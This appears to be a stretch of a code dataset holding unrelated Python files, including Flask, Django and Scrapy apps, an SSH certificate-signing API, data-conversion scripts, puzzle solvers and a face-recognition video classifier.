pass\n else:\n tags.append(tag_name)\n mdb.mfile.update_one({'title':self.title},{'$set':{'tags':tags}})\n\n def remove_tag(self, tag_name):\n mfile = mdb.mfile.find_one({'title':self.title})\n if tag_name in mfile['tags']:\n tags = mfile['tags']\n print(tags)\n #tags_new = tags.remove(tag_name)\n tags.remove(tag_name)\n print(tags)\n mdb.mfile.update_one({'title':self.title},{'$set':{'tags':tags}})\n else:\n pass\n\n @property\n def tags(self):\n mfile = mdb.mfile.find_one({'title':self.title})\n if not mfile:\n tags = []\n return tags\n elif not mfile['tags']:\n tags =[]\n return tags\n else:\n tags = mfile['tags']\n return tags\n\nclass Category(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(80))\n\n def __init__(self, name):\n self.name = name\n\n def __repr__(self):\n return '' % self.name\n\n@app.route('/')\ndef index():\n target_dir = '/home/shiyanlou/files/'\n articles = File.query.all()\n return render_template('index.html',articles=articles)\n\n\n@app.route('/files/')\ndef file(file_id):\n article = File.query.filter_by(id=file_id).first()\n if not article:\n abort(404)\n else:\n return render_template('file.html',article=article)\n\n@app.errorhandler(404)\ndef not_found(error):\n return render_template('404.html'), 404\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"week24/news/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"407272537","text":"# NataCalc\n# GAE application for calculating mean pace swimming times.\n\nimport os\n\nimport jinja2\nimport webapp2\n\nfrom libdeporcalc import Calculator\n\nJINJA_ENVIRONMENT = jinja2.Environment(\n loader=jinja2.FileSystemLoader( os.path.dirname( __file__ ) ),\n extensions=[ \"jinja2.ext.autoescape\" ],\n autoescape=True )\n\ndef parseFloat(s):\n\ttoret = 0.0;\n\n\ts = s.replace( ',', '.' );\n\ttry:\n\t\ttoret = float( s );\n\texcept:\n\t\ttoret = 0.0\n\n\treturn toret;\n\ndef parseInt(s):\n\ttoret = 0;\n\n\ttry:\n\t\ttoret = int( s );\n\texcept:\n\t\ttoret = 0\n\n\treturn toret;\n\nclass ResultsPage(webapp2.RequestHandler):\n\tAnswerPageFile = \"answer.html\";\n\n\tdef __init__(self, request=None, response=None):\n\t\tself.initialize( request, response )\n\n\t\tself.hours = parseInt( self.request.get( \"h\", \"0\" ) );\n\t\tself.minutes = parseInt( self.request.get( \"m\", \"1\" ) );\n\t\tself.seconds = parseInt( self.request.get( \"s\", \"30\" ) );\n\t\tself.distance = parseFloat( self.request.get( \"d\", \"0.1\" ) );\n\n\tdef post(self):\n\t\tcalc = Calculator( self.distance, self.hours, self.minutes, self.seconds );\n\t\tcalc.calculate();\n\n\t\ttemplate_values = {\n\t\t\t'd': self.distance,\n\t\t\t'h': str.format( \"{0:02}\", self.hours ),\n\t\t\t'm': str.format( \"{0:02}\", self.minutes ),\n\t\t\t's': str.format( \"{0:02}\", self.seconds ),\n\t\t\t'kmsh': str.format( \"{0:5}\", calc.getKmsPerHour() ),\n\t\t\t't100m': Calculator.formatTime( calc.getTimePer100m() ),\n\t\t\t'tkm': Calculator.formatTime( calc.getTimePer1000m() ),\n }\n\n\t\ttemplate = JINJA_ENVIRONMENT.get_template( ResultsPage.AnswerPageFile )\n\t\tself.response.write( template.render( template_values ) );\n\napp = webapp2.WSGIApplication([\n ('/calc', ResultsPage),\n], debug=True)\n","sub_path":"deporcalc.py","file_name":"deporcalc.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"448968854","text":"def is_palindrome(n):\n return str(n) == str(n)[::-1]\n\n\ndef is_prime(n):\n if n == 2 or n == 3:\n return True\n if n < 2 or n % 2 == 0:\n return False\n if n < 9:\n return True\n if n % 3 == 0:\n return False\n r = int(n ** 0.5)\n f = 5\n while f <= r:\n if not n % f:\n return False\n if not n % (f+2):\n return False\n f += 6\n return True\n\n\nif __name__ == '__main__':\n max_count = 1000\n for x in range(max_count, 2, -1):\n if is_palindrome(x) and is_prime(x):\n print(x)\n break\n","sub_path":"easy/003-prime-palindrome/prime_palindrome.py","file_name":"prime_palindrome.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"156442425","text":"from bs4 import BeautifulSoup\nimport sys\nimport subprocess\n\n\nFilenameAthletes=sys.argv[1]\nFilenameOutput=sys.argv[2]\n\n#print(\"Filename = \" + Filename)\n\nAthleteText = open(FilenameAthletes, 'r').read().encode('ascii', 'ignore')\n\nathleteTraverse=0\n#athleteTraverse=1850000\n\nprint(\"Total Length: \" + str(len(AthleteText)))\n\nwhile (athleteTraverse0):\n currentString=\"crossfit 27-17,\"\n athleteTraverse=athleteTraverse+14\n\n if (currentString.find('ossFit 4:13')>0):\n currentString=\"crossfit 4-13,\"\n athleteTraverse=athleteTraverse+14\n\n if (currentString.find('ville: The Anvil')>0):\n currentString=\"Crossfit Summerville- The Anvil,\"\n athleteTraverse=athleteTraverse+25\n\n # find lb and convert to kg\n if (currentString.find(' lb,')>-1):\n locationOfUnit=currentString.find('lb')\n remainString=currentString[:locationOfUnit]\n \n intValue=int(remainString)\n newValue=int(round(intValue/2.2))\n\n #print(str(athleteTraverse)+\" \"+ str(newValue))\n\n \n AthleteText=AthleteText[:athleteTraverse]+str(newValue)+\",\"+AthleteText[nextComma:]\n\n # find and remove \" cm\"\n if (currentString.find(' cm,')>-1):\n #print(\"REMOVED CM\" + str(currentString))\n locationOfUnit=currentString.find(' cm')\n remainString=currentString[:locationOfUnit]\n \n #print(str(athleteTraverse)+\" \"+ str(newValue))\n\n AthleteText=AthleteText[:athleteTraverse]+remainString+AthleteText[nextComma-1:]\n\n # find and remove \" kg\"\n if (currentString.find(' kg,')>-1):\n #print(\"REMOVED KG\" + str(currentString))\n locationOfUnit=currentString.find(' kg')\n remainString=currentString[:locationOfUnit]\n \n #print(str(athleteTraverse)+\" \"+ str(newValue))\n\n AthleteText=AthleteText[:athleteTraverse]+remainString+AthleteText[nextComma-1:]\n\n # find inches and convert to cm\n if ((currentString.find('\\'')>-1) and (currentString.find('\\\"')>-1)):\n locationOfSingleQuote=currentString.find('\\'')\n remainString=currentString[:locationOfSingleQuote]\n \n intValue=int(remainString)\n feetValue=int(round(intValue*12))\n\n locationOfDoubleQuote=currentString.find('\\\"')\n remainString=currentString[locationOfSingleQuote+1:locationOfDoubleQuote]\n \n intValue=int(remainString)\n inchesValue=int(intValue)\n\n totalInches=feetValue+inchesValue\n\n #print(\"Total Inches: \" + str(totalInches))\n\n AthleteText=AthleteText[:athleteTraverse]+str(int(round(totalInches*2.54)))+\",\"+AthleteText[nextComma:]\n\n # find minutes and convert to seconds\n if ((currentString.find(':')>-1) and (currentString.find('oss')<0)):\n\n locationOfColon=currentString.find(':')\n remainString=currentString[:locationOfColon]\n \n intValue=int(remainString)\n minuteValue=int(round(intValue*60))\n\n secondsValue=int(currentString[(currentString.find(':')+1):len(currentString)-1])\n\n totalSeconds=minuteValue+secondsValue\n\n #print(\"Total Seconds: \" + str(totalSeconds))\n\n AthleteText=AthleteText[:athleteTraverse]+str(totalSeconds)+\",\"+AthleteText[nextComma:]\n \n if (athleteTraverse%20000<1):\n percentage=float(athleteTraverse*100/len(AthleteText))\n #print(len(AthleteText))\n print(str(athleteTraverse)+ \"-\" +str(percentage)+\"%\")\n \n athleteTraverse=athleteTraverse+1\n #athleteTraverse=nextComma+1\n\nAthleteText=\"ID,NAME,REGION,TEAM,AFFILIATE,GENDER,AGEyrs,HEIGHTcm,WEIGHTkg,FRANsec,HELENsec,GRACEsec,FILTHY50sec,FIGHTGONEBAD,SPRINT400Msec,RUN5Ksec,CLEANJERKkg,SNATCHkg,DEADLIFTkg,BACKSQUATkg,MAXPULLUPS,13-1Rank,13-1Score,13-2Rank,13-2Score,13-3Rank,13-3Score,13-4Rank,13-4Score,13-5Rank,13-5Score\"+AthleteText\n\nwith open(sys.argv[2], \"w\") as f:\n f.write(AthleteText+\"\\n\")\n f.close()\n\n\n","sub_path":"convert-units.py","file_name":"convert-units.py","file_ext":"py","file_size_in_byte":4136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"113699486","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\n\ndef index(request):\n title = 'Phastload'\n sitename = 'Main site'\n descr = 'Description'\n context = {'title' : title, 'sitename' : sitename, 'descr' : descr}\n\n return render(\n request,\n 'mainsite.html',\n context\n )\n #return HttpResponse(\"Hello, world.\")\n","sub_path":"phastload/mainsite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"284800702","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport os\n\nfrom .items import PageItem\nfrom aqhi.airquality import utils\nfrom aqhi.airquality import models\n\n\nclass SavePagePipeline(object):\n @staticmethod\n def _backup_to_file(city_name, res_dir, content, logger):\n file_name = '{}.html'.format(city_name)\n with open(os.path.join(res_dir, file_name), 'wb') as f:\n f.write(content)\n logger.info(\"Successfully backup the page of city '{}'\".format(city_name))\n\n def process_item(self, item, spider):\n logger = spider.custom_logger\n to_parse = spider.to_parse\n if isinstance(item, PageItem):\n city_name = item['name']\n if to_parse:\n page_content = item['page'].decode()\n # save record to database first\n try:\n info_dict, create_status = utils.parse_and_create_records_from_html(page_content, city_name)\n record_info = '{name} on {dtm}'.format(name=city_name, dtm=info_dict['update_dtm'])\n if create_status['success'] == 1:\n logger.info('Successfully save a record: {}'.format(record_info))\n else:\n err_type = create_status['error_type']\n if err_type == 'UniquenessError':\n logger.warn('Ignore duplicate record: {}'.format(record_info))\n else:\n logger.error('Fail to save record: {record} because of {err_type}: {err_msg}'.format(\n record=record_info,\n err_type=err_type,\n err_msg=create_status['info']\n ))\n except Exception as e:\n logger.error(\"Exception raised when parsing web page and saving record of city '{city}': {e}\".format(\n city=city_name,\n e=repr(e)\n ))\n finally:\n # backup file\n self._backup_to_file(city_name, spider.res_dir, item['page'], logger)\n else:\n self._backup_to_file(city_name, spider.res_dir, item['page'], logger)\n","sub_path":"aqhi/airquality/crawler/pm25in/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"248764625","text":"import codecs\nimport os\nimport os.path\nimport shutil\n\nTARGET = \"101_ObjectCategories\"\nOUTDIR = \"caltech101\"\n\nif not os.path.exists(OUTDIR):\n os.mkdir(OUTDIR)\n\nfor category in os.listdir(TARGET):\n for file in os.listdir(\"%s/%s\" % (TARGET, category)):\n image_file = \"%s/%s/%s\" % (TARGET, category, file)\n rename_file = \"%s/%s-%s\" % (OUTDIR, category, file.replace(\"iamge_\", \"\"))\n print(\"%s -> %s\" % (image_file, rename_file))\n shutil.copyfile(image_file, rename_file)\n","sub_path":"rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"580721852","text":"from django.conf import settings\nfrom django.db import models\nfrom django.utils import timezone\n\nfrom .thread import Thread\n\n\nclass ThreadView(models.Model):\n thread = models.ForeignKey(\n Thread,\n on_delete=models.CASCADE,\n related_name='thread_views'\n )\n user = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE,\n related_name='thread_views'\n )\n viewed_on = models.DateTimeField(default=timezone.now)\n\n class Meta:\n constraints = [\n models.UniqueConstraint(\n fields=['thread', 'user'],\n name='unique_thread_user_on_threadview'\n )\n ]\n","sub_path":"src/flyapps/threads/models/thread/thread_view.py","file_name":"thread_view.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"500745504","text":"import traceback\nfrom datetime import timedelta\nfrom typing import Dict\n\nfrom flask import Blueprint, request, abort, jsonify\nfrom werkzeug.datastructures import FileStorage\n\nfrom API import db\nfrom KeyManagementToolLib.Helpers.Crypto.Primitives.RawPublicKey import RawPublicKey\nfrom KeyManagementToolLib.Helpers.Crypto.Primitives.Signer import default_backend\nfrom KeyManagementToolLib.Helpers.Crypto.Primitives.Signer.Errors import SignError\nfrom KeyManagementToolLib.MetaStorage.Errors import NotExistingException\nfrom KeyManagementToolLib.MetaStorage.SQLAlchemyMetaStorage import SQLAlchemyMetaStorage\n\ncert_view = Blueprint('cert', __name__)\n\nbackend = default_backend()\nmeta = SQLAlchemyMetaStorage(backend, db.db_session)\n\n\n@cert_view.route('/sign/&&', methods=['POST'])\ndef admin_signPublicKey(groupid, userid, duration_days):\n # check if the post request has the file part\n print(request.files)\n print(list(request.files.keys()))\n if 'file' not in request.files.keys():\n return abort(400, \"No file given\")\n file = request.files['file'] # type: FileStorage\n # if user does not select file, browser also\n # submit an empty part without filename\n # if file.content_length == 0:\n # return abort(400, \"Empty file given\")\n # if file and file.content_length < 10000:\n bytes_content = file.stream.read(10000)\n if len(bytes_content) == 0:\n return abort(400, \"Empty file given\")\n\n str_content = bytes_content.decode('utf-8')\n employee_public_key = RawPublicKey(str_content)\n try:\n group = meta.getProjectGroupByID(groupid)\n except NotExistingException:\n return abort(404, \"No such Group with id \" + repr(groupid))\n project = meta.getProjectByID(group.in_project)\n ca = meta.makeProjectGroupCA(groupid)\n\n try:\n user = meta.getUserByID(userid)\n except NotExistingException:\n return abort(404, \"No such User with id \" + repr(userid))\n serial = meta.getNextCertificateSerial()\n cert = backend.signPublicKeyWithPrivateKeyForUserForProject(employee_public_key, ca.ca_private_key,\n user.username,\n group.group_name, project.project_name,\n project.project_domain,\n serial, timedelta(days=duration_days))\n return cert.str_repr\n\n\n@cert_view.route('/signme//', methods=['POST'])\ndef user_signPublicKey(employeeid, return_type):\n with meta:\n # Todo: authentification of user, anyone could upload his public key and bruteforce employeeids, certificates table\n # gets bloated, maybe auth-service makes request to this api\n return_type = return_type.lower()\n # print('return_type', return_type, return_type is 'dict', return_type is 'list')\n if return_type not in ('list', 'dict'):\n return abort(400, \"Unsupported return type\")\n try:\n employee = meta.getEmployeeByID(employeeid)\n except NotExistingException:\n return abort(404, \"No such Employee with id \" + repr(employeeid))\n if 'file' not in request.files.keys():\n return abort(400, \"No file given\")\n # Todo: request.files propert call raises OSError: Invalid chunk header\n file = request.files['file'] # type: FileStorage\n # if user does not select file, browser also\n # submit an empty part without filename\n # if file.content_length == 0:\n # return abort(400, \"Empty file given\")\n # if file and file.content_length < 10000:\n bytes_content = file.stream.read(10000)\n if len(bytes_content) == 0:\n return abort(400, \"Empty file given\")\n str_content = bytes_content.decode('ascii')\n employee_public_key = RawPublicKey(str_content)\n\n certs = {} # type: Dict[str, Dict[str, str]]\n for ca, user, host, group, project, (start, end) in meta.getGrantedMetaForEmployee(\n employee.employeeid):\n # print(ca_id, username, user_id, hostname, groupname, projectname, projectdomain)\n serial = meta.getNextCertificateSerial()\n try:\n cert = backend.signPublicKeyWithPrivateKeyForUserForProject(employee_public_key, ca.ca_private_key,\n user.username,\n group.group_name,\n project.project_name,\n project.project_domain, serial,\n (start, end))\n except SignError as e:\n traceback.print_exc()\n return abort(500, \"Unable to sign key, \" + repr(e))\n host_user_id = meta.getHostUserMappingID(host.host_id, user.user_id).host_user_id\n meta.addCertificate(cert, ca.authority_id, host_user_id, employee.employeeid)\n identifier = user.username + '__' + host.host_name + '__' + group.group_name + '__' + project.project_name\n identifier = identifier.replace(' ', '_')\n certs[identifier] = {\n 'cert': cert.str_repr,\n 'user': user.username,\n 'host': host.host_name,\n 'address': host.host_address,\n 'group': group.group_name,\n 'project': project.project_name\n }\n if return_type == 'dict':\n return jsonify(certs)\n if return_type == 'list':\n return jsonify([certs[k]['cert'] for k in certs.keys()])\n\n\nraise NotImplementedError","sub_path":"API/views/cert.py","file_name":"cert.py","file_ext":"py","file_size_in_byte":5957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"344445049","text":"import sys\nsys.setrecursionlimit(2000)\ninput = sys.stdin.readline\n\nN, M, H = map(int, input().split())\nboard = [[0] * N for _ in range(H)]\nminval = 4\nladders = set()\n\nfor i in range(M):\n x, y = map(int, input().split())\n board[x-1][y-1] = 1\n\ndef play(board):\n for start in range(N):\n cur_y = start\n for cur_x in range(H):\n if board[cur_x][cur_y] == 1:\n cur_y += 1\n elif cur_y > 0 and board[cur_x][cur_y-1] == 1:\n cur_y -= 1\n if start != cur_y:\n return False\n return True\n\ndef dfs(count, x, y):\n global minval\n if play(board):\n minval = min(minval, count)\n return\n if count == 3 or minval <= count:\n return\n for i in range(x, H):\n k = y if i == x else 0\n for j in range(k, N-1):\n if board[i][j] == 0 and board[i][j+1] == 0:\n board[i][j] = 1\n dfs(count+1, i, j+2)\n board[i][j] = 0\n \ndfs(0, 0,0)\n\nif minval == 4:\n print(-1)\nelse:\n print(minval)","sub_path":"삼성 SW 역량 테스트 기출 문제/15684_사다리조작.py","file_name":"15684_사다리조작.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"56075579","text":"import pandas as pd\n\nfrom source.query.merger.merger_triplets_generator import MergerStrategiesProvider\nfrom source.query.scores_service.domain import ScorerKey, MergerKey\nfrom source.storage.stores.artifact_store.interface import ArtifactStoreInterface\nfrom source.storage.stores.artifact_store.types.quest.model_selector import ModelSelectionSummaryArtifact\nfrom source.storage.stores.general_quest_data_store.interface import GeneralQuestDataStoreInterface\nfrom source.storage.stores.split_kernel_store.interface import SplitKernelStoreInterface\n\n\nclass ModelSelector(object):\n def __init__(self, scores_service, artifact_store, general_quest_data_store,\n split_kernel_store, model_loss_calculator, merging_tasks_generator):\n \"\"\"\n @type scores_service: L{ScoresService}\n\n @type split_kernel_store: L{SplitKernelStoreInterface}\n @type general_quest_data_store: L{GeneralQuestDataStoreInterface}\n @type merging_tasks_generator: L{MergerStrategiesProvider}\n\n @type artifact_store: L{ArtifactStoreInterface}\n @type model_loss_calculator:\n \"\"\"\n self.__split_kernel_store = split_kernel_store\n self.__scores_service = scores_service\n self.__general_quest_data_store = general_quest_data_store\n self.__merging_tasks_generator = merging_tasks_generator\n self.__artifact_store = artifact_store\n\n self.__model_loss_calculator = model_loss_calculator\n\n def retrieve_best_merger_key(self, customer_id, quest_id, past_queries_metadata, present_query_metadata, ml_conf,\n merger_conf, preselected_merger, hit_rate_thresholds, feature_flags):\n merger_keys_to_str_map = self.__map_merger_keys_to_str(ml_conf, merger_conf)\n\n mergers_eligible_for_selection = {key: value for key, value in merger_keys_to_str_map.items()\n if 'ExternalScorer' not in key and 'RandomScorer' not in key}\n\n # If FDE overrides model selection by past, return his fixed scorer:\n if len(preselected_merger) > 0:\n # if selected scorer is ensemble\n if preselected_merger[\"scorer_name\"] == 'logistic_ensemble':\n scorer_key = ScorerKey(preselected_merger[\"scorer_name\"], preselected_merger.get('scorer_params', None),\n 'internal')\n else:\n\n scorer_key = ScorerKey(preselected_merger[\"scorer_name\"], preselected_merger.get('scorer_params', None))\n selected_merger_key = MergerKey(preselected_merger['merger_name'], preselected_merger['params'], scorer_key)\n\n else:\n # If past exists, apply model selection by past\n if self.__check_if_past_exists(past_queries_metadata, customer_id, quest_id, feature_flags):\n selected_merger_key = self.__get_best_model_by_past(mergers_eligible_for_selection,\n customer_id, quest_id,\n past_queries_metadata, hit_rate_thresholds,\n feature_flags)\n # Output default merger\n else:\n selected_merger_key = self.__get_default_model(mergers_eligible_for_selection)\n\n # Always try to run algorithm on present query\n # noinspection PyBroadException\n try:\n self.select_single_query_model(mergers_eligible_for_selection, customer_id, quest_id,\n present_query_metadata, hit_rate_thresholds, feature_flags)\n except Exception:\n pass\n\n return selected_merger_key\n\n @staticmethod\n def __get_triplet_by_merger_id(merger_tasks, merger_id):\n df = pd.DataFrame({name: [a[name] for a in merger_tasks] for name in [\"merger_model\", \"scorer_id\", \"variant\",\n \"merger_id\"]})\n res = df[df[\"merger_id\"] == merger_id].values[0]\n return tuple(res)\n\n def __get_best_model_by_past(self, mergers_keys_map, customer_id, quest_id, queries_metadata, hit_rate_thresholds,\n feature_flags):\n\n present_selection = None\n for query_metadata in queries_metadata:\n # fetch data\n best_merger_key, thresholds, losses = self.select_single_query_model(mergers_keys_map, customer_id, quest_id,\n query_metadata, hit_rate_thresholds,\n feature_flags)\n\n if query_metadata.role == 'validation_past':\n present_selection = best_merger_key\n\n return present_selection\n\n @staticmethod\n def __remove_complex_models(merger_keys_str_map, thresh_hr_df):\n\n good_mergers = [merger_name for merger_name, merger_key in merger_keys_str_map.items() if\n ((merger_key.model_name == \"LogisticRegression\" and\n merger_key.model_params.values()[0] == 1e-06) or\n (merger_key.model_name == \"BaggingRegression\") or\n (merger_key.model_name == \"RandomForest\") or (merger_key.model_name == \"Query0Merger\"))]\n return thresh_hr_df[good_mergers]\n\n def extract_best_merger_per_query(self, merger_keys_str_map, hit_rates, kernel_summary, hit_rate_thresholds):\n # merging_tasks_eligible_for_selection = \\\n # filter(lambda x: all(name not in x['scorer_id'] for name in ['ExternalScorer', 'RandomScorer']),\n # merging_tasks)\n relevant_sorted_thresholds, models_losses = self.__model_loss_calculator.calc_models_losses(hit_rates,\n kernel_summary,\n hit_rate_thresholds)\n\n if models_losses is not None:\n\n best_model_name, best_model_loss = models_losses.idxmin().values[0], models_losses.min().values[0]\n best_merger_key = merger_keys_str_map[best_model_name]\n else:\n # TODO(Shahar): add tests for this flow: where max hit rates are 0 for all selected thresholds\n best_merger_key = self.__get_default_model(merger_keys_str_map)\n best_model_loss = -1\n\n return best_merger_key, best_model_loss, relevant_sorted_thresholds, models_losses\n\n def __get_all_mergers_hr(self, customer_id, quest_id, query_id, feature_flags, merger_keys_str_map):\n all_merger_hr = self.__scores_service.load_mergers_precisions(customer_id, quest_id, query_id,\n feature_flags, merger_keys_str_map)\n\n return all_merger_hr\n\n def __build_query_selection_artifact(self, query_metadata, customer_id, quest_id, best_merger_key,\n best_model_loss, thresholds, losses):\n\n best_merger_id = str(best_merger_key)\n best_merger_name = best_merger_key.model_name\n best_merger_params = best_merger_key.model_params\n best_scorer_name = best_merger_key.scorer_name\n\n if losses is not None:\n\n losses_artifact = losses.to_dict()\n else:\n losses_artifact = {}\n\n artifact = ModelSelectionSummaryArtifact(customer_id, quest_id, query_metadata.query_id, query_metadata.role,\n best_merger_id, best_merger_name, best_scorer_name, best_merger_params,\n best_model_loss, list(thresholds), losses_artifact)\n\n return artifact\n\n def select_single_query_model(self, merger_keys_str_map, customer_id, quest_id, query_role, hit_rate_thresholds,\n feature_flags):\n hit_rates = self.__get_all_mergers_hr(customer_id, quest_id, query_role.query_id, feature_flags,\n merger_keys_str_map)\n simple_models_hr = self.__remove_complex_models(merger_keys_str_map, hit_rates)\n\n kernel_summary = self.__general_quest_data_store.load_kernel_summary_new(customer_id, quest_id,\n query_role.query_id)\n\n best_merger_key, best_model_loss, thresholds, losses = self.extract_best_merger_per_query(merger_keys_str_map,\n simple_models_hr,\n kernel_summary,\n hit_rate_thresholds)\n\n selection_artifact = self.__build_query_selection_artifact(query_role, customer_id,\n quest_id, best_merger_key, best_model_loss,\n thresholds, losses)\n\n self.__artifact_store.store_artifact(selection_artifact)\n return best_merger_key, thresholds, losses\n\n def __get_default_model(self, eligible_merger_keys_map):\n logistic_regressions_models = [model_key for model_key in eligible_merger_keys_map.values() if\n model_key.model_name == \"LogisticRegression\"]\n also_logistic_ensemble = [model_key for model_key in logistic_regressions_models if\n model_key.scorer_name.startswith('logistic_ensemble')]\n\n also_default_variants = [model_key for model_key in also_logistic_ensemble\n if model_key.model_params.get('regularization_factor', None) == 1e-06 and\n model_key.scorer_name.endswith('regularization_factor=0.000001')]\n\n if len(also_default_variants) > 0:\n best_effort_collection = also_default_variants\n elif len(also_logistic_ensemble) > 0:\n best_effort_collection = also_logistic_ensemble\n elif len(logistic_regressions_models) > 0:\n best_effort_collection = logistic_regressions_models\n else:\n best_effort_collection = eligible_merger_keys_map.values()\n\n return best_effort_collection[0]\n\n def __check_if_ground_in_validation_past(self, past_queries_metadata, customer_id, quest_id, feature_flags):\n validation_query_id = [query_metadata.query_id for query_metadata in past_queries_metadata if\n query_metadata.role == 'validation_past'][0]\n kernel_summary = self.__general_quest_data_store.load_kernel_summary_new(customer_id, quest_id,\n validation_query_id)\n ground_in_past = kernel_summary['summary']['num_ground']\n return ground_in_past>0\n\n def __get_model_id(self, merger_model, merger_variant, scorer_id):\n\n params_str = '_'.join(\"%s=%s\" % (key, val) for (key, val) in\n merger_variant.iteritems())\n merger_id = \"_\".join([merger_model, params_str])\n return \"_\".join([merger_id, scorer_id])\n\n def __map_merger_keys_to_str(self, ml_conf, merger_conf):\n merging_tasks = list(self.__merging_tasks_generator.get_merging_tasks(ml_conf, merger_conf))\n merger_key_str_map = {}\n for merging_task in merging_tasks:\n merger_key = MergerKey(merging_task[\"merger_model\"], merging_task[\"variant\"],\n merging_task[\"scorer_id\"])\n merger_key_str_map[str(merger_key)] = merger_key\n return merger_key_str_map\n\n def __check_if_past_exists(self, past_queries_metadata, customer_id, quest_id, feature_flags):\n return len(past_queries_metadata) > 0 and self.__check_if_ground_in_validation_past(past_queries_metadata,\n customer_id, quest_id,\n feature_flags)\n\n\n","sub_path":"source/query/model_selection/model_selector.py","file_name":"model_selector.py","file_ext":"py","file_size_in_byte":12393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"350226222","text":"import json\nimport re\nimport time\n\nfrom six.moves import queue\nimport handler\nimport osvcd_shared as shared\nimport rcExceptions as ex\nfrom rcGlobalEnv import rcEnv\n\n\nclass Handler(handler.Handler):\n \"\"\"\n Wait for the current data generation number to reach all live nodes.\n \"\"\"\n routes = (\n (\"GET\", \"sync\"),\n )\n prototype = [\n ]\n access = {\n \"roles\": [\"guest\"],\n \"namespaces\": \"ANY\",\n }\n\n def action(self, nodename, thr=None, stream_id=None, **kwargs):\n thr.selector = \"\"\n ref_gen = shared.GEN\n if not thr.event_queue:\n thr.event_queue = queue.Queue()\n if not thr in thr.parent.events_clients:\n thr.parent.events_clients.append(thr)\n if self.match(ref_gen):\n return {\"status\": 0, \"data\": {\"satisfied\": True, \"gen\": ref_gen}}\n timeout = time.time() + 60\n end = False\n while True:\n left = timeout - time.time()\n if left < 0:\n left = 0\n try:\n thr.event_queue.get(True, left if left < 3 else 3)\n except queue.Empty:\n if left < 3:\n end = True\n if self.match(ref_gen):\n return {\"status\": 0, \"data\": {\"satisfied\": True, \"gen\": ref_gen}}\n if end:\n return {\"status\": 1, \"data\": {\"satisfied\": False, \"gen\": ref_gen}}\n\n def match(self, ref_gen):\n for node, gen in shared.LOCAL_GEN.items():\n if gen < ref_gen:\n return False\n return True\n\n","sub_path":"lib/handlerGetSync.py","file_name":"handlerGetSync.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"393276791","text":"import cv2\r\nimport dlib\r\nimport encoding_functions\r\nimport pickle\r\n\r\n\r\nclass IdentifyVideo:\r\n\r\n with open(\"Classifier/Classifier_Model.clf\", 'rb') as f:\r\n knn_clf = pickle.load(f)\r\n\r\n def __init__(self):\r\n pass\r\n\r\n def classify_face_for_video(self, image):\r\n\r\n face_name = \"Unknown\"\r\n\r\n face_bounding_boxes = encoding_functions.face_locations(image)\r\n landmarks = encoding_functions.raw_face_landmarks(image, image_face_locations=face_bounding_boxes)\r\n\r\n if len(face_bounding_boxes) == 0:\r\n return \"Unknown\"\r\n\r\n encodings = encoding_functions.extract_encodings(image, facial_landmarks=landmarks)\r\n\r\n # Use the KNN model to find the best matches for the test face\r\n closest_distances = self.knn_clf.kneighbors(encodings, n_neighbors=1)\r\n are_matches = [closest_distances[0][i][0] <= 0.6 for i in\r\n range(len(face_bounding_boxes))] # distance_threshold = 0.6\r\n\r\n for pred, loc, rec in zip(self.knn_clf.predict(encodings), face_bounding_boxes, are_matches):\r\n\r\n if rec:\r\n face_name = pred\r\n else:\r\n face_name = \"Unknown\"\r\n\r\n return face_name\r\n\r\n def classify_faces(self):\r\n\r\n face_detector = dlib.get_frontal_face_detector()\r\n\r\n capture = cv2.VideoCapture(0, cv2.CAP_DSHOW)\r\n face_name_list = []\r\n while True:\r\n ret, frame = capture.read()\r\n\r\n faces = face_detector(frame, 1)\r\n\r\n for face in faces:\r\n left = face.left()\r\n top = face.top()\r\n right = face.right()\r\n bottom = face.bottom()\r\n\r\n width = right - left\r\n height = bottom - top\r\n\r\n image_crop = frame[top:top + height, left:left + width]\r\n\r\n face_name = (self.classify_face_for_video(image_crop))\r\n face_name_list.append(face_name)\r\n\r\n cv2.rectangle(frame, (left - 5, bottom + 5), (right + 5, top - 20), (0, 255, 0), 3)\r\n cv2.rectangle(frame, (left - 7, bottom + 5),\r\n (right + 7, bottom + 20), (0, 255, 0), -1)\r\n cv2.putText(frame, face_name, (left - 5, bottom + 15), cv2.FONT_HERSHEY_COMPLEX, 0.5,\r\n (255, 255, 255), 2)\r\n\r\n cv2.imshow(\"Live Camera\", frame)\r\n\r\n if cv2.waitKey(100) & 0xFF == 27:\r\n break\r\n\r\n cv2.destroyAllWindows()\r\n return 